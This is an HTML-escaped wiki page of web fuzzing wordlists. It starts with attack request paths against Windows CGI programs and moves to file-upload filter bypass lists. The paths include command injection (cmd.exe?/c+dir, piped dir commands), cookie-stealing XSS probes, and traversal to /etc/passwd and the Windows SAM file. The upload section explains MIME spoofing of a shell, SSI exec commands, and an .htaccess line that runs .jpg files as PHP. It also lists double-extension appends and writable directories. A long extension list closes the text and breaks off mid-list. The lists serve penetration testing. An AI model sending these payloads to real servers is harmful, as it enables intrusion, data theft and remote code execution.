# adam.muntner@quietmove.com&lt;br /&gt;
&lt;br /&gt;
cart32.exe&lt;br /&gt;
get32.exe&lt;br /&gt;
visadmin.exe&lt;br /&gt;
foxweb.exe&lt;br /&gt;
webplus.exe?about&lt;br /&gt;
fpsrvadm.exe&lt;br /&gt;
MsmMask.exe&lt;br /&gt;
cmd.exe?/c+dir&lt;br /&gt;
cmd1.exe?/c+dir&lt;br /&gt;
post32.exe|dir%20c:\\&lt;br /&gt;
cgitest.exe&lt;br /&gt;
hpnst.exe?c=p+i=&lt;br /&gt;
Pbcgi.exe&lt;br /&gt;
testcgi.exe&lt;br /&gt;
webfind.exe?keywords=01234567890123456789&lt;br /&gt;
redir.exe?URL=http%3A%2F%2Fwww%2Egoogle%2Ecom%2F%0D%0A%0D%0A%3C&lt;br /&gt;
test-cgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
athcgi.exe?command=showpage&amp;amp;script='],[0,0]];alert('Vulnerable');a=[['&lt;br /&gt;
mkilog.exe&lt;br /&gt;
mkplog.exe&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
MsmMask.exe?mask=/junk334&lt;br /&gt;
perl.exe?-v&lt;br /&gt;
perl.exe&lt;br /&gt;
ppdscgi.exe&lt;br /&gt;
c32web.exe/ChangeAdminPassword&lt;br /&gt;
windmail.exe&lt;br /&gt;
dbmlparser.exe&lt;br /&gt;
cgimail.exe&lt;br /&gt;
minimal.exe&lt;br /&gt;
rguest.exe&lt;br /&gt;
visitor.exe&lt;br /&gt;
webbbs.exe&lt;br /&gt;
wguest.exe&lt;br /&gt;
/_vti_bin/fpcount.exe?Page=default.htm|Image=3|Digits=15&lt;br /&gt;
cfgwiz.exe&lt;br /&gt;
Cgitest.exe&lt;br /&gt;
mailform.exe&lt;br /&gt;
post16.exe&lt;br /&gt;
imagemap.exe&lt;br /&gt;
htimage.exe/path/filename?2,2&lt;br /&gt;
htimage.exe&lt;br /&gt;
Webnews.exe&lt;br /&gt;
texis.exe/junk&lt;br /&gt;
apexec.pl?etype=odp&amp;amp;template=../../../../../../../../../../etc/passwd%00.html&amp;amp;passurl=/category/&lt;br /&gt;
sensepost.exe?/c+dir&lt;br /&gt;
testcgi.exe&lt;br /&gt;
testcgi.exe?&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;&lt;br /&gt;
ion-p.exe?page=c:\winnt\repair\sam&lt;br /&gt;
../../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
NUL/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
PRN/../../../../../../../../../WINNT/system32/ipconfig.exe&lt;br /&gt;
c32web.exe/GetImage?ImageName=CustomerEmail.txt%00.pdf &lt;br /&gt;
foxweb.dll&lt;br /&gt;
wconsole.dll&lt;br /&gt;
shtml.dll&lt;br /&gt;
scripts/slxweb.dll/getfile?type=Library&amp;amp;file=[invalid filename]&lt;br /&gt;
rightfax/fuwww.dll/?&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%&lt;br /&gt;
WINDMAIL.EXE?%20-n%20c:\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\&lt;br /&gt;
GW5/GWWEB.EXE&lt;br /&gt;
GW5/GWWEB.EXE?GET-CONTEXT&amp;amp;HTMLVER=AAA&lt;br /&gt;
GW5/GWWEB.EXE?HELP=bad-request&lt;br /&gt;
GWWEB.EXE?HELP=bad-request&lt;br /&gt;
echo.bat&lt;br /&gt;
echo.bat?&amp;amp;dir+c:\\&lt;br /&gt;
hello.bat?&amp;amp;dir+c:\\&lt;br /&gt;
input.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
input2.bat?|dir&lt;br /&gt;
input2.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
test-cgi.bat&lt;br /&gt;
test.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\..\\..\\&lt;br /&gt;
tst.bat|dir%20..\\..\\..\\..\\..\\..\\..\\..\\,&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== File Upload Filter Bypass   (Update: 17 March 2009 s ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# File Upload Fuzzfile - File Name Filter Bypass&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
# For MIME filter bypass, your shellscript should look like&lt;br /&gt;
# -------&lt;br /&gt;
# GIF89aP;&lt;br /&gt;
# [shell]&lt;br /&gt;
# -------&lt;br /&gt;
#&lt;br /&gt;
# For mod_cgi Server Side Include upload attacks&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;ls&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
#or, on Windows&lt;br /&gt;
#&lt;br /&gt;
#&amp;lt;!--#exec cmd=&amp;quot;dir&amp;quot; --&amp;gt;&lt;br /&gt;
#&lt;br /&gt;
# Sometimes you can overwrite .htaccess in an upload folder on Apache httpd, try setting .jpg to executable. If you can set the target directory, try fuzz the list of all dirs you've enumberated on the servers, and try the commonly writable directory fuzzfile.&lt;br /&gt;
#&lt;br /&gt;
# example .htaccess that sets mime type .jpg to be executable:&lt;br /&gt;
# -----&lt;br /&gt;
# AddType application/x-httpd-php .jpg&lt;br /&gt;
# -----&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
%00index.html&lt;br /&gt;
;index.html&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cross-Platform File Upload Filter Bypass - Filename Appends   (Update: 17 March 2010  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;# Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2010 - notes&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
# also: use &amp;quot;gim&amp;quot; to create a .jpg image with the meta comment field set to:&lt;br /&gt;
# -----&lt;br /&gt;
#&amp;lt;?php phpinfo(); ?&amp;gt; &lt;br /&gt;
#-----&lt;br /&gt;
&lt;br /&gt;
{PHPSCRIPT}&lt;br /&gt;
{PHPSCRIPT}.phtml&lt;br /&gt;
{PHPSCRIPT}.php.html&lt;br /&gt;
{PHPSCRIPT}.php::$DATA&lt;br /&gt;
{PHPSCRIPT}.php.php.rar &lt;br /&gt;
{PHPSCRIPT}.php.rar&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Microsoft-Specific Cross-Platform File Upload Filter Bypass - Filename &amp;lt;pre&amp;gt;Appends  (Update: 17 March 2009  ===&lt;br /&gt;
# Microsoft-Specific Cross-Platform File Upload Filter Bypass Appends  (Update: 17 March 2009&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{ASPSCRIPT}&lt;br /&gt;
{ASPSCRIPT};&lt;br /&gt;
{ASPSCRIPT};.jpg&lt;br /&gt;
{ASPSCRIPT};.pdf&lt;br /&gt;
{ASPSCRIPT};.html&lt;br /&gt;
{ASPSCRIPT};.htm&lt;br /&gt;
{ASPSCRIPT};.txt&lt;br /&gt;
{ASPSCRIPT};.xyz&lt;br /&gt;
{ASPSCRIPT};.zip&lt;br /&gt;
{ASPSCRIPT};.tgz&lt;br /&gt;
{ASPSCRIPT};.doc&lt;br /&gt;
{ASPSCRIPT};.docx&lt;br /&gt;
{ASPSCRIPT};.xls&lt;br /&gt;
{ASPSCRIPT};.xlsx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=== Commonly Writable directories File Upload Filter Bypass - Filename  Appends  (&amp;lt;pre&amp;gt;Update: 17 March 2009  ===&lt;br /&gt;
#Commonly Writable directories File Upload Filter Bypass - Filename Appends  (Update: 17 March 2009 &lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
{HOST}/templates_compiled/&lt;br /&gt;
{HOST}/templates_c/&lt;br /&gt;
{HOST}/templates/&lt;br /&gt;
{HOST}/temporary/&lt;br /&gt;
{HOST}/images/&lt;br /&gt;
{HOST}/cache/&lt;br /&gt;
{HOST}/temp/&lt;br /&gt;
{HOST}/files/&lt;br /&gt;
{HOST}/tmp/&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863 ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 #Common Data File Extensions  (Update: 16 March 2010 - Total Statements: 863&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# released under creative commons license&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
.$er&lt;br /&gt;
.123&lt;br /&gt;
.1pe&lt;br /&gt;
.1ph&lt;br /&gt;
.3dr&lt;br /&gt;
.3dt&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.4dv&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.a3l&lt;br /&gt;
.a3m&lt;br /&gt;
.a3w&lt;br /&gt;
.a4l&lt;br /&gt;
.a4m&lt;br /&gt;
.a4w&lt;br /&gt;
.a5l&lt;br /&gt;
.a5w&lt;br /&gt;
.a65&lt;br /&gt;
.aao&lt;br /&gt;
.ab&lt;br /&gt;
.ab1&lt;br /&gt;
.ab2&lt;br /&gt;
.ab3&lt;br /&gt;
.abcd&lt;br /&gt;
.abi&lt;br /&gt;
.abp&lt;br /&gt;
.aby&lt;br /&gt;
.aca&lt;br /&gt;
.acc&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.ade&lt;br /&gt;
.adp&lt;br /&gt;
.adt&lt;br /&gt;
.adx&lt;br /&gt;
.aft&lt;br /&gt;
.agd&lt;br /&gt;
.aifb&lt;br /&gt;
.alc&lt;br /&gt;
.ald&lt;br /&gt;
.ali&lt;br /&gt;
.amb&lt;br /&gt;
.amsorm&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.apr&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ask&lt;br /&gt;
.asm&lt;br /&gt;
.ast&lt;br /&gt;
.at5&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.awg&lt;br /&gt;
.azw&lt;br /&gt;
.bafl&lt;br /&gt;
.bci&lt;br /&gt;
.bcm&lt;br /&gt;
.bdf&lt;br /&gt;
.bdic&lt;br /&gt;
.bfx&lt;br /&gt;
.bgl&lt;br /&gt;
.bgt&lt;br /&gt;
.bin&lt;br /&gt;
.bjo&lt;br /&gt;
.bk&lt;br /&gt;
.bkk&lt;br /&gt;
.blb&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.bok&lt;br /&gt;
.box&lt;br /&gt;
.brd&lt;br /&gt;
.brw&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btm&lt;br /&gt;
.btr&lt;br /&gt;
.cap&lt;br /&gt;
.cat&lt;br /&gt;
.cbg&lt;br /&gt;
.cch&lt;br /&gt;
.ccr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.cdx&lt;br /&gt;
.cel&lt;br /&gt;
.celtx&lt;br /&gt;
.chg&lt;br /&gt;
.chk&lt;br /&gt;
.chn&lt;br /&gt;
.ckd&lt;br /&gt;
.ckt&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.clp&lt;br /&gt;
.cmbl&lt;br /&gt;
.cna&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.crd&lt;br /&gt;
.crtx&lt;br /&gt;
.csa&lt;br /&gt;
.csv&lt;br /&gt;
.ctf&lt;br /&gt;
.ctt&lt;br /&gt;
.cursorfx&lt;br /&gt;
.curxptheme&lt;br /&gt;
.cvd&lt;br /&gt;
.cvn&lt;br /&gt;
.cwk&lt;br /&gt;
.cws&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.cyo&lt;br /&gt;
.cys&lt;br /&gt;
.daf&lt;br /&gt;
.dal&lt;br /&gt;
.dam&lt;br /&gt;
.das&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.db2&lt;br /&gt;
.db3&lt;br /&gt;
.dbc&lt;br /&gt;
.dbd&lt;br /&gt;
.dbf&lt;br /&gt;
.dbx&lt;br /&gt;
.dcf&lt;br /&gt;
.dcl&lt;br /&gt;
.dcm&lt;br /&gt;
.dcmd&lt;br /&gt;
.ddc&lt;br /&gt;
.ddcx&lt;br /&gt;
.ddt&lt;br /&gt;
.dem&lt;br /&gt;
.des&lt;br /&gt;
.dex&lt;br /&gt;
.dfm&lt;br /&gt;
.dfproj&lt;br /&gt;
.dft&lt;br /&gt;
.dgb&lt;br /&gt;
.dif&lt;br /&gt;
.dii&lt;br /&gt;
.dlg&lt;br /&gt;
.dm2&lt;br /&gt;
.dmo&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dockzip&lt;br /&gt;
.dp1&lt;br /&gt;
.dpn&lt;br /&gt;
.dpx&lt;br /&gt;
.drl&lt;br /&gt;
.dsb&lt;br /&gt;
.dsd&lt;br /&gt;
.dsk&lt;br /&gt;
.dsy&lt;br /&gt;
.dsz&lt;br /&gt;
.dt0&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.dtr&lt;br /&gt;
.dvdproj&lt;br /&gt;
.dvo&lt;br /&gt;
.dwi&lt;br /&gt;
.e00&lt;br /&gt;
.eap&lt;br /&gt;
.ebuild&lt;br /&gt;
.ec0&lt;br /&gt;
.eco&lt;br /&gt;
.ecx&lt;br /&gt;
.edb&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.egp&lt;br /&gt;
.emb&lt;br /&gt;
.emd&lt;br /&gt;
.emlxpart&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epp&lt;br /&gt;
.epub&lt;br /&gt;
.epw&lt;br /&gt;
.er1&lt;br /&gt;
.esp&lt;br /&gt;
.ess&lt;br /&gt;
.est&lt;br /&gt;
.esx&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.etd&lt;br /&gt;
.etl&lt;br /&gt;
.ev&lt;br /&gt;
.ev3&lt;br /&gt;
.evt&lt;br /&gt;
.evy&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.exx&lt;br /&gt;
.fa&lt;br /&gt;
.fasta&lt;br /&gt;
.fbl&lt;br /&gt;
.fcd&lt;br /&gt;
.fcs&lt;br /&gt;
.fdb&lt;br /&gt;
.ffd&lt;br /&gt;
.ffwp&lt;br /&gt;
.fhc&lt;br /&gt;
.fid&lt;br /&gt;
.fil&lt;br /&gt;
.flame&lt;br /&gt;
.fll&lt;br /&gt;
.flo&lt;br /&gt;
.flp&lt;br /&gt;
.flt&lt;br /&gt;
.fm&lt;br /&gt;
.fm5&lt;br /&gt;
.fmp&lt;br /&gt;
.fo&lt;br /&gt;
.fob&lt;br /&gt;
.fol&lt;br /&gt;
.fop&lt;br /&gt;
.fox&lt;br /&gt;
.fp&lt;br /&gt;
.fp3&lt;br /&gt;
.fp4&lt;br /&gt;
.fp5&lt;br /&gt;
.fp7&lt;br /&gt;
.frl&lt;br /&gt;
.frm&lt;br /&gt;
.fro&lt;br /&gt;
.frx&lt;br /&gt;
.fsb&lt;br /&gt;
.fsc&lt;br /&gt;
.ftm&lt;br /&gt;
.ftw&lt;br /&gt;
.gan&lt;br /&gt;
.gbr&lt;br /&gt;
.gc&lt;br /&gt;
.gcx&lt;br /&gt;
.gdb&lt;br /&gt;
.ged&lt;br /&gt;
.gedcom&lt;br /&gt;
.gen&lt;br /&gt;
.ggb&lt;br /&gt;
.gml&lt;br /&gt;
.gms&lt;br /&gt;
.gno&lt;br /&gt;
.gnp&lt;br /&gt;
.gp3&lt;br /&gt;
.gpi&lt;br /&gt;
.gps&lt;br /&gt;
.gpx&lt;br /&gt;
.gra&lt;br /&gt;
.grade&lt;br /&gt;
.grf&lt;br /&gt;
.grib&lt;br /&gt;
.grk&lt;br /&gt;
.grr&lt;br /&gt;
.grv&lt;br /&gt;
.gs&lt;br /&gt;
.gst&lt;br /&gt;
.gtp&lt;br /&gt;
.gwk&lt;br /&gt;
.gxl&lt;br /&gt;
.hcc&lt;br /&gt;
.hce&lt;br /&gt;
.hci&lt;br /&gt;
.hcp&lt;br /&gt;
.hcr&lt;br /&gt;
.hcu&lt;br /&gt;
.hda&lt;br /&gt;
.hdb&lt;br /&gt;
.hdf&lt;br /&gt;
.hdi&lt;br /&gt;
.hdl&lt;br /&gt;
.hif&lt;br /&gt;
.hl&lt;br /&gt;
.hml&lt;br /&gt;
.hmt&lt;br /&gt;
.hs2&lt;br /&gt;
.hsk&lt;br /&gt;
.hst&lt;br /&gt;
.htg&lt;br /&gt;
.huh&lt;br /&gt;
.hyv&lt;br /&gt;
.i5z&lt;br /&gt;
.ib&lt;br /&gt;
.ics&lt;br /&gt;
.id2&lt;br /&gt;
.idx&lt;br /&gt;
.igc&lt;br /&gt;
.ihx&lt;br /&gt;
.ii&lt;br /&gt;
.iif&lt;br /&gt;
.img&lt;br /&gt;
.imt&lt;br /&gt;
.ink&lt;br /&gt;
.inp&lt;br /&gt;
.ins&lt;br /&gt;
.ip&lt;br /&gt;
.irock&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.isf&lt;br /&gt;
.itdb&lt;br /&gt;
.itl&lt;br /&gt;
.itm&lt;br /&gt;
.itn&lt;br /&gt;
.itw&lt;br /&gt;
.itx&lt;br /&gt;
.ivt&lt;br /&gt;
.iw&lt;br /&gt;
.ixb&lt;br /&gt;
.jasper&lt;br /&gt;
.jdb&lt;br /&gt;
.jef&lt;br /&gt;
.jmp&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.joboptions&lt;br /&gt;
.joined&lt;br /&gt;
.jph&lt;br /&gt;
.jrprint&lt;br /&gt;
.jrxml&lt;br /&gt;
.jude&lt;br /&gt;
.kap&lt;br /&gt;
.kdb&lt;br /&gt;
.kid&lt;br /&gt;
.kismac&lt;br /&gt;
.kmz&lt;br /&gt;
.kpf&lt;br /&gt;
.kpp&lt;br /&gt;
.kpr&lt;br /&gt;
.kpx&lt;br /&gt;
.kpz&lt;br /&gt;
.l&lt;br /&gt;
.l6t&lt;br /&gt;
.laccdb&lt;br /&gt;
.lbl&lt;br /&gt;
.lbx&lt;br /&gt;
.lcd&lt;br /&gt;
.lcf&lt;br /&gt;
.lcm&lt;br /&gt;
.ldif&lt;br /&gt;
.lex&lt;br /&gt;
.lgc&lt;br /&gt;
.lgf&lt;br /&gt;
.lgh&lt;br /&gt;
.lgi&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.lif&lt;br /&gt;
.livereg&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lix&lt;br /&gt;
.llb&lt;br /&gt;
.lms&lt;br /&gt;
.lmx&lt;br /&gt;
.lnt&lt;br /&gt;
.loc&lt;br /&gt;
.lp7&lt;br /&gt;
.lrf&lt;br /&gt;
.lrs&lt;br /&gt;
.lrx&lt;br /&gt;
.lsf&lt;br /&gt;
.lsl&lt;br /&gt;
.lsp&lt;br /&gt;
.lsr&lt;br /&gt;
.lst&lt;br /&gt;
.lsu&lt;br /&gt;
.lvm&lt;br /&gt;
.lw4&lt;br /&gt;
.ly&lt;br /&gt;
.m&lt;br /&gt;
.mag&lt;br /&gt;
.mai&lt;br /&gt;
.map&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mbf&lt;br /&gt;
.mbg&lt;br /&gt;
.mbl&lt;br /&gt;
.mbp&lt;br /&gt;
.mbx&lt;br /&gt;
.mc1&lt;br /&gt;
.mc9&lt;br /&gt;
.mcd&lt;br /&gt;
.md&lt;br /&gt;
.mdb&lt;br /&gt;
.mdc&lt;br /&gt;
.mdf&lt;br /&gt;
.mdl&lt;br /&gt;
.mdm&lt;br /&gt;
.mdn&lt;br /&gt;
.mdt&lt;br /&gt;
.mdx&lt;br /&gt;
.mdz&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mex&lt;br /&gt;
.mfo&lt;br /&gt;
.mfp&lt;br /&gt;
.mgc&lt;br /&gt;
.mls&lt;br /&gt;
.mm&lt;br /&gt;
.mmap&lt;br /&gt;
.mmc&lt;br /&gt;
.mmf&lt;br /&gt;
.mmp&lt;br /&gt;
.mnc&lt;br /&gt;
.mng&lt;br /&gt;
.mnk&lt;br /&gt;
.mno&lt;br /&gt;
.mny&lt;br /&gt;
.mobi&lt;br /&gt;
.moho&lt;br /&gt;
.mosaic&lt;br /&gt;
.mox&lt;br /&gt;
.mpd&lt;br /&gt;
.mpj&lt;br /&gt;
.mpp&lt;br /&gt;
.mpt&lt;br /&gt;
.mpx&lt;br /&gt;
.mpz&lt;br /&gt;
.mq4&lt;br /&gt;
.ms10&lt;br /&gt;
.mth&lt;br /&gt;
.mtw&lt;br /&gt;
.mud&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mws&lt;br /&gt;
.mwx&lt;br /&gt;
.mxd&lt;br /&gt;
.myd&lt;br /&gt;
.myi&lt;br /&gt;
.nb&lt;br /&gt;
.nc&lt;br /&gt;
.ndf&lt;br /&gt;
.ndk&lt;br /&gt;
.ndx&lt;br /&gt;
.net&lt;br /&gt;
.neta&lt;br /&gt;
.nfo&lt;br /&gt;
.nitf&lt;br /&gt;
.nmind&lt;br /&gt;
.not&lt;br /&gt;
.notebook&lt;br /&gt;
.np&lt;br /&gt;
.npl&lt;br /&gt;
.npt&lt;br /&gt;
.nrl&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.nsf&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.nvl&lt;br /&gt;
.nyf&lt;br /&gt;
.oab&lt;br /&gt;
.obj&lt;br /&gt;
.odb&lt;br /&gt;
.odf&lt;br /&gt;
.odp&lt;br /&gt;
.ods&lt;br /&gt;
.odx&lt;br /&gt;
.oeaccount&lt;br /&gt;
.ofc&lt;br /&gt;
.ofm&lt;br /&gt;
.oft&lt;br /&gt;
.ofx&lt;br /&gt;
.omcs&lt;br /&gt;
.omp&lt;br /&gt;
.ond&lt;br /&gt;
.one&lt;br /&gt;
.oo3&lt;br /&gt;
.opf&lt;br /&gt;
.opx&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.or6&lt;br /&gt;
.org&lt;br /&gt;
.orx&lt;br /&gt;
.otf&lt;br /&gt;
.otl&lt;br /&gt;
.otln&lt;br /&gt;
.ots&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ova&lt;br /&gt;
.ovf&lt;br /&gt;
.p96&lt;br /&gt;
.p97&lt;br /&gt;
.pab&lt;br /&gt;
.paf&lt;br /&gt;
.pan&lt;br /&gt;
.pbd&lt;br /&gt;
.pc&lt;br /&gt;
.pcap&lt;br /&gt;
.pcb&lt;br /&gt;
.pcr&lt;br /&gt;
.pd4&lt;br /&gt;
.pd5&lt;br /&gt;
.pdas&lt;br /&gt;
.pdb&lt;br /&gt;
.pdd&lt;br /&gt;
.pdm&lt;br /&gt;
.pds&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pep&lt;br /&gt;
.pex&lt;br /&gt;
.pfc&lt;br /&gt;
.pfl&lt;br /&gt;
.phb&lt;br /&gt;
.phm&lt;br /&gt;
.pi&lt;br /&gt;
.pis&lt;br /&gt;
.pjx&lt;br /&gt;
.pka&lt;br /&gt;
.pkb&lt;br /&gt;
.pkh&lt;br /&gt;
.pks&lt;br /&gt;
.pkt&lt;br /&gt;
.pln&lt;br /&gt;
.plw&lt;br /&gt;
.pmo&lt;br /&gt;
.pmr&lt;br /&gt;
.pnproj&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pod&lt;br /&gt;
.poi&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pot&lt;br /&gt;
.potm&lt;br /&gt;
.potx&lt;br /&gt;
.pp2&lt;br /&gt;
.ppf&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.prc&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.prj&lt;br /&gt;
.prm&lt;br /&gt;
.prs&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.psm&lt;br /&gt;
.pst&lt;br /&gt;
.ptb&lt;br /&gt;
.ptf&lt;br /&gt;
.ptk&lt;br /&gt;
.ptm&lt;br /&gt;
.ptn&lt;br /&gt;
.ptt&lt;br /&gt;
.ptz&lt;br /&gt;
.pvl&lt;br /&gt;
.pwd&lt;br /&gt;
.pxj&lt;br /&gt;
.pxl&lt;br /&gt;
.q07&lt;br /&gt;
.q08&lt;br /&gt;
.q09&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qdfm&lt;br /&gt;
.qel&lt;br /&gt;
.qfx&lt;br /&gt;
.qif&lt;br /&gt;
.qpb&lt;br /&gt;
.qpf&lt;br /&gt;
.qph&lt;br /&gt;
.qpm&lt;br /&gt;
.qpw&lt;br /&gt;
.qrp&lt;br /&gt;
.qsd&lt;br /&gt;
.ral&lt;br /&gt;
.rbt&lt;br /&gt;
.rcd&lt;br /&gt;
.rcg&lt;br /&gt;
.rdb&lt;br /&gt;
.rdf&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.ret&lt;br /&gt;
.rf1&lt;br /&gt;
.rfa&lt;br /&gt;
.rfo&lt;br /&gt;
.rge&lt;br /&gt;
.rgn&lt;br /&gt;
.rgo&lt;br /&gt;
.rmuf&lt;br /&gt;
.rnq&lt;br /&gt;
.rod&lt;br /&gt;
.rog&lt;br /&gt;
.roi&lt;br /&gt;
.rou&lt;br /&gt;
.rpp&lt;br /&gt;
.rpt&lt;br /&gt;
.rrt&lt;br /&gt;
.rsc&lt;br /&gt;
.rsd&lt;br /&gt;
.rsw&lt;br /&gt;
.rte&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.rzb&lt;br /&gt;
.s85&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sar&lt;br /&gt;
.sav&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sca&lt;br /&gt;
.scf&lt;br /&gt;
.sch&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sdp&lt;br /&gt;
.sdq&lt;br /&gt;
.sds&lt;br /&gt;
.sen&lt;br /&gt;
.seo&lt;br /&gt;
.seq&lt;br /&gt;
.ser&lt;br /&gt;
.sgml&lt;br /&gt;
.sgn&lt;br /&gt;
.shp&lt;br /&gt;
.shs&lt;br /&gt;
.shx&lt;br /&gt;
.skc&lt;br /&gt;
.skv&lt;br /&gt;
.skx&lt;br /&gt;
.sle&lt;br /&gt;
.slk&lt;br /&gt;
.slp&lt;br /&gt;
.snapfireshow&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sps&lt;br /&gt;
.spub&lt;br /&gt;
.spv&lt;br /&gt;
.sq&lt;br /&gt;
.sqd&lt;br /&gt;
.sql&lt;br /&gt;
.sqlite&lt;br /&gt;
.sqr&lt;br /&gt;
.sta&lt;br /&gt;
.stc&lt;br /&gt;
.stf&lt;br /&gt;
.stk&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.stp&lt;br /&gt;
.str&lt;br /&gt;
.stt&lt;br /&gt;
.stw&lt;br /&gt;
.styk&lt;br /&gt;
.stykz&lt;br /&gt;
.swk&lt;br /&gt;
.sxc&lt;br /&gt;
.sxi&lt;br /&gt;
.sy3&lt;br /&gt;
.t01&lt;br /&gt;
.t02&lt;br /&gt;
